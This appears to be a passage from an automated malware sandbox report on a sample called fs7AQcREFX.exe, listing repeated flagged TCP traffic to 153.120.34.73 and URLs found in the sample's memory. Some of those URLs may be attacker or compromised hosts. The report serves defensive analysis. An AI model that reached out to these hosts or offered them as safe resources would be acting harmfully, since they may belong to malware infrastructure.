                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.facebook.com/PohlFoodService" target="_blank"> equals www.facebook.com (Facebook)
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.linkedin.com/company/pohl-food-service" target="_blank"> equals www.linkedin.com (Linkedin)
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-youtube elementor-repeater-item-6def677" href="https://www.youtube.com/channel/UCvpY2zO1GRvxBdgkg7BUm-A" target="_blank"> equals www.youtube.com (Youtube)
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <meta property="article:publisher" content="https://www.facebook.com/PohlFoodService" /> equals www.facebook.com (Facebook)
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-linkedin elementor-repeater-item-dd39117" href="https://www.linkedin.com/company/comsit-distribution-gmbh/" target="_blank"> equals www.linkedin.com (Linkedin)
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-youtube elementor-repeater-item-9c5067a" href="https://www.youtube.com/@ComSITDistributionGmbH" target="_blank"> equals www.youtube.com (Youtube)
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false,"isScriptDebug":false},"i18n":{"shareOnFacebook":"Auf Facebook teilen","shareOnTwitter":"Auf Twitter teilen","pinIt":"Anheften","download":"Download","downloadImage":"Bild downloaden","fullscreen":"Vollbild","zoom":"Zoom","share":"Teilen","playVideo":"Video abspielen","previous":"Zur\u00fcck","next":"Weiter","close":"Schlie\u00dfen"},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"responsive":{"breakpoints":{"mobile":{"label":"Mobile Portrait","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Mobile Landscape","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"Tablet Portrait","value":1024,"default_value":1024,"direction":"max","is_enabled":true},"tablet_extra":{"label":"Tablet Landscape","value":1200,"default_value":1200,"direction":"max","is_enabled":false},"laptop":{"label":"Laptop","value":1366,"default_value":1366,"direction":"max","is_enabled":false},"widescreen":{"label":"Breitbild","value":2400,"default_value":2400,"direction":"min","is_enabled":false}}},"version":"3.13.3","is_static":false,"experimentalFeatures":{"e_dom_optimization":true,"e_optimized_assets_loading":true,"e_optimized_css_loading":true,"a11y_improvements":true,"additional_custom_breakpoints":true,"e_swiper_latest":true,"theme_builder_v2":true,"hello-theme-header-footer":true,"landing-pages":true,"page-transitions":true,"notes":true,"loop":true,"form-submissions":true,"e_scroll_snap":true},"urls":{"assets":"http:\/\/www.com-sit.com\/wp-content\/plugins\/elementor\/assets\/"},"swiperClass":"swiper","settings":{"page":[],"editorPreferences":[]},"kit":{"active_breakpoints":["viewport_mobile","viewport_tablet"],"global_image_lightbox":"yes","lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"yes","lightbox_title_src":"title","lightbox_description_src":"description","hello_header_logo_type":"title","hello_header_menu_layout":"horizontal","hello_footer_logo_type":"logo"},"post":{"id":46,"title":"Comsit%20Website","excerpt":"","featuredImage":false}}; equals www.facebook.com (Facebook)
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false,"isScriptDebug":false},"i18n":{"shareOnFacebook":"Auf Facebook teilen","shareOnTwitter":"Auf Twitter teilen","pinIt":"Anheften","download":"Download","downloadImage":"Bild downloaden","fullscreen":"Vollbild","zoom":"Zoom","share":"Teilen","playVideo":"Video abspielen","previous":"Zur\u00fcck","next":"Weiter","close":"Schlie\u00dfen"},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"responsive":{"breakpoints":{"mobile":{"label":"Mobile Portrait","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Mobile Landscape","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"Tablet Portrait","value":1024,"default_value":1024,"direction":"max","is_enabled":true},"tablet_extra":{"label":"Tablet Landscape","value":1200,"default_value":1200,"direction":"max","is_enabled":false},"laptop":{"label":"Laptop","value":1366,"default_value":1366,"direction":"max","is_enabled":false},"widescreen":{"label":"Breitbild","value":2400,"default_value":2400,"direction":"min","is_enabled":false}}},"version":"3.13.3","is_static":false,"experimentalFeatures":{"e_dom_optimization":true,"e_optimized_assets_loading":true,"e_optimized_css_loading":true,"a11y_improvements":true,"additional_custom_breakpoints":true,"e_swiper_latest":true,"theme_builder_v2":true,"hello-theme-header-footer":true,"landing-pages":true,"page-transitions":true,"notes":true,"loop":true,"form-submissions":true,"e_scroll_snap":true},"urls":{"assets":"http:\/\/www.com-sit.com\/wp-content\/plugins\/elementor\/assets\/"},"swiperClass":"swiper","settings":{"page":[],"editorPreferences":[]},"kit":{"active_breakpoints":["viewport_mobile","viewport_tablet"],"global_image_lightbox":"yes","lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"yes","lightbox_title_src":"title","lightbox_description_src":"description","hello_header_logo_type":"title","hello_header_menu_layout":"horizontal","hello_footer_logo_type":"logo"},"post":{"id":46,"title":"Comsit%20Website","excerpt":"","featuredImage":false}}; equals www.twitter.com (Twitter)
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://2.gravatar.com/avatar/8f1795d9778dd5337c87d22e0464e1c3?s=96&amp;d=mm&amp;r=g
                      Source: fs7AQcREFX.exe, 00000000.00000002.716832808.0000000000B22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ara.ex-olive.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.633716697.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.512849987.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.513941237.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.399549475.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517712783.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.514211859.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.628447842.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.515047997.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630741825.0000000000D60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif
                      Source: fs7AQcREFX.exe, 00000000.00000002.716832808.0000000000B22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://biurohera.pl/m/
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.633716697.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.512849987.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.513941237.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.399549475.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517712783.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.506643329.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.514211859.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.628447842.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.515047997.0000000000D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://blog.goo.ne.jp/baijaco/
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://blog.goo.ne.jp/baijakujaco
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493212132.0000000003230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://c.statcounter.com/9484561/0/b0cbab70/1/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006154000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://chart.apis.google.com/chart?chs=100x100&cht=qr&chld=L
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://erp-companion.com-sit.com/de/user/login
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.399549475.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.513417856.0000000007290000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517712783.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.515047997.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517172157.0000000000B90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://furec.sakura.ne.jp/
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gholographic.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gmpg.org/xfn/11
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.513941237.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.399549475.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.395263793.0000000006F90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517712783.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.514211859.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.515047997.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.513206122.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.397997118.0000000003600000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hummer.hu/
